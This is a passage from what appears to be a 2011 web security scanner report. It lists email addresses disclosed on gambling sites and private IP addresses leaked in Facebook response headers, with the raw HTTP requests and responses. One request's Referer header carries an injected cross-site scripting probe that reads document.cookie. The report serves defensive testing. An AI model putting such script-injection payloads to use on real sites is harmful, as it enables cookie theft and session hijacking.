User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.57. http://www.primescratchcards.com/Responsible.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The following email addresses were disclosed in the response:

care@PrimeScratchCards.com
support@primescratchcards.com

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23384
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:care@PrimeScratchCards.com">care@PrimeScratchCards.com</a>
...[SNIP]...
<a href="mailto:care@PrimeScratchCards.com">care@PrimeScratchCards.com </a>
...[SNIP]...

21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.59. http://www.primescratchcards.com/aboutus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.60. http://www.primescratchcards.com/affiliates.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The following email addresses were disclosed in the response:

affiliates@primepartners.com
support@primescratchcards.com

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.61. http://www.primescratchcards.com/contactus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.62. http://www.primescratchcards.com/fairplay.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.63. http://www.primescratchcards.com/help.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.64. http://www.primescratchcards.com/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The following email addresses were disclosed in the response:

author@TechSystems.com
management@portaldepot.net
support@primescratchcards.com

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29848
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:26 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.65. http://www.primescratchcards.com/media.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The following email addresses were disclosed in the response:

marketing@primegaming.com
pr@primegaming.com
support@primescratchcards.com

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22031
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:marketing@primegaming.com">marketing@primegaming.com</a>
...[SNIP]...
<a href="mailto:pr@primegaming.com">pr@primegaming.com</a>
...[SNIP]...

21.66. http://www.primescratchcards.com/playersclub.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The following email addresses were disclosed in the response:

VIP@primescratchcards.com
support@primescratchcards.com

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:VIP@primescratchcards.com">VIP@primescratchcards.com</a>
...[SNIP]...

21.67. http://www.primescratchcards.com/promotions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.68. http://www.primescratchcards.com/terms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.69. http://www.primescratchcards.com/underage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The following email addresses were disclosed in the response:

support@PrimeScratchCards.com
support@primescratchcards.com

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:support@PrimeScratchCards.com">support@PrimeScratchCards.com</a>
...[SNIP]...

21.70. http://www.primescratchcards.com.br/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com.br
Path:	/

Issue detail

The following email addresses were disclosed in the response:

author@TechSystems.com
management@portaldepot.net
support@primescratchcards.com

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24365
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: MTH=1072%2D100%2Dpt; expires=Wed, 15-Jun-2011 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=MKIMCHNDLBCPHFIMNELFEJOM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var scrollerD
...[SNIP]...

21.71. http://www.svenskalotter.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Affiliates.aspx

Issue detail

The following email address was disclosed in the response:

affiliates@svenskalotter.com

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

21.72. http://www.svenskalotter.com/Charity.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Charity.aspx

Issue detail

The following email address was disclosed in the response:

Charity@Svenskalotter.com

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

21.73. http://www.verisign.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22. Private IP addresses disclosed previous next
There are 58 instances of this issue:

http://connect.facebook.net/en_US/all.js
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js
http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css
http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js
http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png
http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png
http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png
http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png
http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/WinningsCom
http://www.facebook.com/WinningsCom
http://www.facebook.com/crazyscratch
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/pages/BigMoneyScratch/156518521055171
http://www.facebook.com/pages/PrimeScratchCards/122783514413813
http://www.facebook.com/peoplespostcodelottery
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
https://www.interwetten.com/cs/Default.aspx
https://www.interwetten.com/de/Default.aspx
https://www.interwetten.com/el/Default.aspx
https://www.interwetten.com/en/Default.aspx
https://www.interwetten.com/en/casino/default.aspx
https://www.interwetten.com/en/games/default.aspx
https://www.interwetten.com/en/online-skillgames
https://www.interwetten.com/en/scratch/default.aspx
https://www.interwetten.com/en/skill/default.aspx
https://www.interwetten.com/es/Default.aspx
https://www.interwetten.com/fr/Default.aspx
https://www.interwetten.com/it/Default.aspx
https://www.interwetten.com/pt/Default.aspx
https://www.interwetten.com/tr/Default.aspx
http://www.metacafe.com/fplayer/

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.130.111

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "8d8820ae13b1e6c701a6f8a11096eff7"
X-FB-Server: 10.32.130.111
X-Cnection: close
Cache-Control: public, max-age=711
Expires: Mon, 16 May 2011 13:03:51 GMT
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118905

/*1305452631,169902703,JIT Construction: v378396,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.173.124

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=40a5266c63e9584b0f6822ab754056cb&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Fpromotion_midle_right.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.173.124
X-Cnection: close
Content-Length: 11543
Cache-Control: public, max-age=31535854
Expires: Tue, 15 May 2012 12:44:49 GMT
Date: Mon, 16 May 2011 12:47:15 GMT
Connection: close

......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.187.115

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=b6e290a77e7489abaa4646b1edb43c5a&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2F5FreePromotion_ENG_GBP.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.187.115
X-Cnection: close
Content-Length: 12721
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

